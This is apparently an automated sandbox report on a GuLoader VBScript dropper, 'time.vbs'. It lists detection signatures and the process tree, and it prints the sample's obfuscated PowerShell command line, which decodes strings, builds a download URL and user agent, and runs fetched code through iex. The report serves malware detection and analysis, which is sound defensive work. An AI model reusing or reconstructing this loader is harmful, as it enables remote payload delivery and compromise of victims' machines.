Windows
Analysis Report
time.vbs
Overview
General Information
Detection
GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 6344 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\time. vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) powershell.exe (PID: 2656 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$palaveri st = 1;$Ma ssesamfund ='Su';$Mas sesamfund+ ='bstrin'; $Massesamf und+='g';F unction Ln kampene($T hurlsvafle rs){$Uindf riede=$Thu rlsvaflers .Length-$p alaverist; For($Thurl =5;$Thurl -lt $Uindf riede;$Thu rl+=6){$Ta chyglossat e+=$Thurls vaflers.$M assesamfun d.Invoke( $Thurl, $p alaverist) ;}$Tachygl ossate;}fu nction Kol esterol($O veranxious ){& ($Maim edly) ($Ov eranxious) ;}$Skovbra ndsbekmpel ses=Lnkamp ene ' Prem MJule o Pe d,zRognfi. artel Rici lRepleaAph an/ Pr n5W ardl. Cong 0Co ta T,e ad(AkupuWF ,rjti Cott n TeledCla rioentrewA nke sPetio Ti.baNEnk nnTComp K ad,1Fejll0 Korp. Bro .0 Pul ;Lo gpe OffsW Dispipleni nbasen6 av in4Korri;s temm Ha.nd x Unfr6,ir kl4Sm,ak;A flev Defen rInfervBed k :lokal1 Baml2Asbes 1Frais.Alu mi0Palp )G astr subge G,retse a, tncSlavekA mideoScann /Pec,i2Und r0Disma1 Co.n0Cornc 0 ispr1bel ly0 Naup1P artr TretF TroeliPang lrDeprae P ne fjowl o DrabxGade f/suffl1 R rbl2E,nea1 Dbend.Rele ,0Semic '; $Organisme rs=Lnkampe ne 'LigegU ,anks An, meFolier,k rob-EquivA Ibr gWall oeDetonnCh amotBedri ';$Skadevo lderne=Lnk ampene 'Vi zirhRashnt MigatF gt ip.imels F rem:Kampe/ Nonou/Sols owDisc,wMi nidwDelag. WardesRide se ExtonS ippdRunges LyterpPost iaSten cLe gate Bo t. Sup rcretr oo.etalmS. kbr/Salvap K,ansr W l eoSchan/Ps ychd Redel Mezzo/Lysp aeBl,nhx a lstwSlage2 LungeoHome l1foreg '; $Malaxate= Lnkampene 'D.bri>Fis ke ';$Maim edly=Lnkam pene 'mudp uiPadeye.r escx Te.t ';$Whammo= 'impery';K olesterol (Lnkampene ' TheoSFa mile.ranst Domi,-Ac,t aC,pplioDi skrn C tot ,lackeThec on ,icht M ou Cento-N ontrPSe.de a R.trtUni c,hGynan M angT fies: Adt.\H.ft aMTrafiu G uldfShapef kasseeRekr nnFinge. P romtFore x stat,tGayp o Ylvas-Ko rreVCr noa HypotlCath eudrueme K o,p Comm,$ BeredWVl i nhBass.aVe dhnmSubsum somo Raas ;Semi ');K olesterol (Lnkampene 'Whem iEf t rf Reti Skygg(Arak atmajore a ttsAm,hit Alek- ,ard pH,rdsa Ag ritSnorehI mpli Produ TWhore:Fra gr\,eostMS arkouE,spa fMon,pf Ge n,eTilsknO pede. frag tHa.tixFar vetgadsh)S ymph{Telef e BltexBlo duiDisoctL eean}.rysa ;Humbu '); $Prevascul ar = Lnkam pene 'Stab ieGstelc R egnhS.lkeo Harm Vi.r %For.ba So lcpSamkvpU valdFonds a.rejetDet ,eaTilen%R edef\Pi.tr O Pri.mArc anrZoogry Bills ortr tMaskinkar nfiA,lurn, ragmgFo,eg eCatchrUnb eg.HoundD Limai Noel mRavne Ste .b&Tragt&d ivel Pseud ePaatrc Et ceh halvoB lee, met o $Krmme ';K olesterol (Lnkampene ' m gg$Re stagForfil SnippoCos. obForfaa L eg,lBerbe: UbetnB Deh onEksp.kBo rdee Su.e= Aphel(Drif tcSydamm C omidB dki ,iffi/Ha r scGenio Fu ldb$FaysgP Tot,lrPrep se HepavVe rdeaUdstrs SnrencBrud euBallalco nseaMilitr Afnaz)Fore b ');Koles